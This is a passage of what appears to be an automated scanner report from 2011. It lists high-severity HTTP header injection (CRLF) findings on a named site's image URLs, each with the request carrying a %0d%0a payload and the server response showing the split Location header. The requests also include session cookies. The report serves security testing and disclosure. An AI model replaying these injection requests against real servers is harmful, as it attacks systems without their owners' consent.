Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/3d3b2
658a9609ca0
/back-front.jpg
Vary: Accept-Encoding
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:11 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/3d3b2
658a9609ca0/back-front.j
...[SNIP]...

1.19. http://utdi.reachlocal.net/images/banr_techcorner.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/banr_techcorner.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9f5da%0d%0a4c3efec7957 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9f5da%0d%0a4c3efec7957/banr_techcorner.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:05 GMT
Server: Apache
Location: http://utdi.com/9f5da
4c3efec7957
/banr_techcorner.jpg
Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/9f5da
4c3efec7957/banr_techcor
...[SNIP]...

1.20. http://utdi.reachlocal.net/images/box-1.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/box-1.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e96a7%0d%0a0a5e41817ac was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e96a7%0d%0a0a5e41817ac/box-1.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:26 GMT
Server: Apache
Location: http://utdi.com/e96a7
0a5e41817ac
/box-1.jpg
Vary: Accept-Encoding
Content-Length: 297
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:19 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/e96a7
0a5e41817ac/box-1.jpg">h
...[SNIP]...

1.21. http://utdi.reachlocal.net/images/box-enews.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/box-enews.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b64f6%0d%0a348ab3e51c0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b64f6%0d%0a348ab3e51c0/box-enews.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:23 GMT
Server: Apache
Location: http://utdi.com/b64f6
348ab3e51c0
/box-enews.jpg
Vary: Accept-Encoding
Content-Length: 301
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:16 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/b64f6
348ab3e51c0/box-enews.jp
...[SNIP]...

1.22. http://utdi.reachlocal.net/images/gpx_avaya_ip500sml.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/gpx_avaya_ip500sml.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fac4e%0d%0ab27292b2e6f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fac4e%0d%0ab27292b2e6f/gpx_avaya_ip500sml.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:04 GMT
Server: Apache
Location: http://utdi.com/fac4e
b27292b2e6f
/gpx_avaya_ip500sml.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/fac4e
b27292b2e6f/gpx_avaya_ip
...[SNIP]...

1.23. http://utdi.reachlocal.net/images/icon_orangecheckball.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/icon_orangecheckball.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3fb1b%0d%0af3643349a48 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3fb1b%0d%0af3643349a48/icon_orangecheckball.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/3fb1b
f3643349a48
/icon_orangecheckball.gif
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/3fb1b
f3643349a48/icon_orangec
...[SNIP]...

1.24. http://utdi.reachlocal.net/images/logo-cisco-webex-main.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/logo-cisco-webex-main.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 94032%0d%0afddf97333c8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /94032%0d%0afddf97333c8/logo-cisco-webex-main.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:22 GMT
Server: Apache
Location: http://utdi.com/94032
fddf97333c8
/logo-cisco-webex-main.gif
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:14 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/94032
fddf97333c8/logo-cisco-w
...[SNIP]...

1.25. http://utdi.reachlocal.net/images/logo_carousel.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/logo_carousel.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5253f%0d%0a9daeaf8bf0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5253f%0d%0a9daeaf8bf0/logo_carousel.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/5253f
9daeaf8bf0
/logo_carousel.jpg
Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/5253f
9daeaf8bf0/logo_carousel
...[SNIP]...

1.26. http://utdi.reachlocal.net/images/logo_cisco_footer.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/logo_cisco_footer.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12683%0d%0a12b8b2e3681 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /images12683%0d%0a12b8b2e3681/logo_cisco_footer.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/images12683
12b8b2e3681
/logo_cisco_footer.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/images12683
12b8b2e3681/logo_c
...[SNIP]...

1.27. http://utdi.reachlocal.net/images/logo_nortel4.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/logo_nortel4.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 71fda%0d%0a954ff42a597 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /71fda%0d%0a954ff42a597/logo_nortel4.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:20 GMT
Server: Apache
Location: http://utdi.com/71fda
954ff42a597
/logo_nortel4.jpg
Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/71fda
954ff42a597/logo_nortel4
...[SNIP]...

1.28. http://utdi.reachlocal.net/images/mainhead_partners.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/mainhead_partners.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload f3e47%0d%0a28fa46348f5 (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (28fa46348f5) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /f3e47%0d%0a28fa46348f5/mainhead_partners.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/f3e47
28fa46348f5
/mainhead_partners.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/f3e47
28fa46348f5/mainhead_par
...[SNIP]...

1.29. http://utdi.reachlocal.net/images/mainhead_smartbuys.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/mainhead_smartbuys.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload 7ccfa%0d%0acc135bb4afe (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (cc135bb4afe) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /images7ccfa%0d%0acc135bb4afe/mainhead_smartbuys.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:03 GMT
Server: Apache
Location: http://utdi.com/images7ccfa
cc135bb4afe
/mainhead_smartbuys.jpg
Vary: Accept-Encoding
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/images7ccfa
cc135bb4afe/mainhe
...[SNIP]...

1.30. http://utdi.reachlocal.net/images/mainpic_blueguy.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/mainpic_blueguy.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload c530b%0d%0ad59940e884 (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (d59940e884) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /c530b%0d%0ad59940e884/mainpic_blueguy.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/c530b
d59940e884
/mainpic_blueguy.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/c530b
d59940e884/mainpic_blueg
...[SNIP]...

1.31. http://utdi.reachlocal.net/images/mainpic_blueheadline.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/mainpic_blueheadline.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload 111fb%0d%0aa1ffc884fd6 (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (a1ffc884fd6) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /111fb%0d%0aa1ffc884fd6/mainpic_blueheadline.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/111fb
a1ffc884fd6
/mainpic_blueheadline.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/111fb
a1ffc884fd6/mainpic_blue
...[SNIP]...

1.32. http://utdi.reachlocal.net/images/navbutton_about-ovr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_about-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied, after URL-decoding, into the Location response header. The payload ac19a%0d%0a7030fac53e2 (a CRLF encoded as %0d%0a) was submitted in the REST URL parameter 1. The decoded CRLF split the Location header, so the text after it (7030fac53e2) was emitted at the start of a new header line: an attacker who controls this parameter can inject arbitrary response headers.

Request

GET /ac19a%0d%0a7030fac53e2/navbutton_about-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
